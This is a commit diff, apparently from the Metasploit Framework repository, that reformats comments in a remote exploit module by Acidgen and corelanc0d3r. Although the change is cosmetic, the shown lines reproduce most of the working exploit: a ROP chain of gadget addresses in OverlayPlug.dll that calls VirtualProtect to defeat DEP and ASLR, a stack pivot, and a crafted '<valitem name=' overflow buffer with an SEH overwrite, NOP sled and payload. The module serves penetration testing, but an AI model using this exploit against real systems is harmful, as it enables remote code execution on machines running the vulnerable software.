Format issue fix
git-svn-id: file:///home/svn/framework3/trunk@12299 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
36367f8a67
commit
300989db5f
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Acidgen', #found the vulnerability
|
||||
'Acidgen', #found the vulnerability
|
||||
'corelanc0d3r', #rop exploit + msf module
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
|
@ -113,26 +113,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# one non-ASLR module is enough for generic ASLR & DEP bypass !
|
||||
# pvefindaddr rop 'n roll
|
||||
# First, grab VirtualProtect ptr
|
||||
0x10065292, # POP EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x106F4244, # IAT entry + offsqet (bad char friendly)
|
||||
0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] **
|
||||
0xEFEFEFF0, # bye bye offset
|
||||
0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [Module : OverlayPlug.dll] **
|
||||
0x10065292, # POP EAX # RETN [OverlayPlug.dll]
|
||||
0x106F4244, # IAT entry + offsqet (bad char friendly)
|
||||
0x10019762, # POP EBP # RETN [OverlayPlug.dll]
|
||||
0xEFEFEFF0, # bye bye offset
|
||||
0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
|
||||
0x100684B8, # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Module : OverlayPlug.dll] **
|
||||
0x10016A56, # XCHG EAX,ESI [Module : OverlayPlug.dll] **
|
||||
0x1005E114, # MOV EAX,DWORD PTR DS:[EAX] # RETN [OverlayPlug.dll]
|
||||
0x10016A56, # XCHG EAX,ESI [OverlayPlug.dll]
|
||||
|
||||
# set size
|
||||
0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :)
|
||||
0x10019762, # POP EBP # RETN [Module : OverlayPlug.dll] **
|
||||
0xEFEFEFF0, # boo
|
||||
0x10084977, # ADD EBP,EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x10053E4C, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] **
|
||||
0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [Module : OverlayPlug.dll] **
|
||||
0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
|
||||
0x10101330, # 0x320 bytes - change this if needed, but don't make it too big :)
|
||||
0x10019762, # POP EBP # RETN [OverlayPlug.dll]
|
||||
0xEFEFEFF0, # boo
|
||||
0x10084977, # ADD EBP,EAX # RETN [OverlayPlug.dll]
|
||||
0x10053E4C, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
|
||||
0x10066D8C, # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
|
@ -155,38 +155,38 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
|
||||
# set NewProtect to 0x40
|
||||
0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [Module : OverlayPlug.dll] **
|
||||
0x100E3D4A, # XOR EAX,EAX # XOR EDX,EDX # RETN [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10010C36, # ADD EAX,10 # POP EBP # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [Module : OverlayPlug.dll] **
|
||||
0x10030C8B, # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4 [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
|
||||
# write pOldProtect to .data section
|
||||
0x1001AB51, # POP ECX # RETN [Module : OverlayPlug.dll] **
|
||||
0x1001AB51, # POP ECX # RETN [OverlayPlug.dll]
|
||||
rand_text_alphanumeric(4).unpack("L")[0].to_i,
|
||||
0x10117030, # RW
|
||||
|
||||
# EDI : ROP NOP
|
||||
0x10057090, # POP EDI # RETN [Module : OverlayPlug.dll] **
|
||||
0x10057090, # POP EDI # RETN [OverlayPlug.dll]
|
||||
0x10057091, # ROP NOP
|
||||
|
||||
# pReturn2Payload
|
||||
0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [Module : OverlayPlug.dll] **
|
||||
0x10016A56, # XCHG EAX,ESI # RETN [Module : OverlayPlug.dll] **
|
||||
0x1003C946, # ADD EAX,0A # RETN [Module : OverlayPlug.dll]
|
||||
0x100BC8E8, # PUSH ESP # MOV EAX,ESI # POP ESI # RETN [OverlayPlug.dll]
|
||||
0x10016A56, # XCHG EAX,ESI # RETN [OverlayPlug.dll]
|
||||
0x1003C946, # ADD EAX,0A # RETN [OverlayPlug.dll]
|
||||
0x1003C946,
|
||||
0x1003C946,
|
||||
0x1003C946,
|
||||
|
@ -206,23 +206,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x1003C946,
|
||||
0x1003C946,
|
||||
0x1003C946,
|
||||
0x1001FDBD, # XCHG EAX,EBP # RETN [Module : OverlayPlug.dll] **
|
||||
0x1001FDBD, # XCHG EAX,EBP # RETN [OverlayPlug.dll]
|
||||
|
||||
0x100A9274, # POP EAX # RETN [Module : OverlayPlug.dll] **
|
||||
0x100A9274, # POP EAX # RETN [OverlayPlug.dll]
|
||||
0x41414141,
|
||||
|
||||
# go
|
||||
0x10066F84, # PUSHAD # RETN [Module : OverlayPlug.dll] **
|
||||
0x10066F84, # PUSHAD # RETN [OverlayPlug.dll]
|
||||
].pack("V*")
|
||||
|
||||
|
||||
buffer = "<valitem name="
|
||||
buffer = "<valitem name="
|
||||
buffer << '"'
|
||||
buffer << rand_text_alphanumeric((target['OffSet']))
|
||||
buffer << rand_text_alphanumeric(4) #nseh
|
||||
buffer << rand_text_alphanumeric(4) #nseh
|
||||
buffer << pivot
|
||||
buffer << rand_text_alphanumeric((target['OffSetToRop']))
|
||||
buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7
|
||||
buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7
|
||||
buffer << rop_gadgets
|
||||
buffer << "\x90" * 150
|
||||
buffer << payload.encoded
|
||||
|
|
Loading…
Reference in New Issue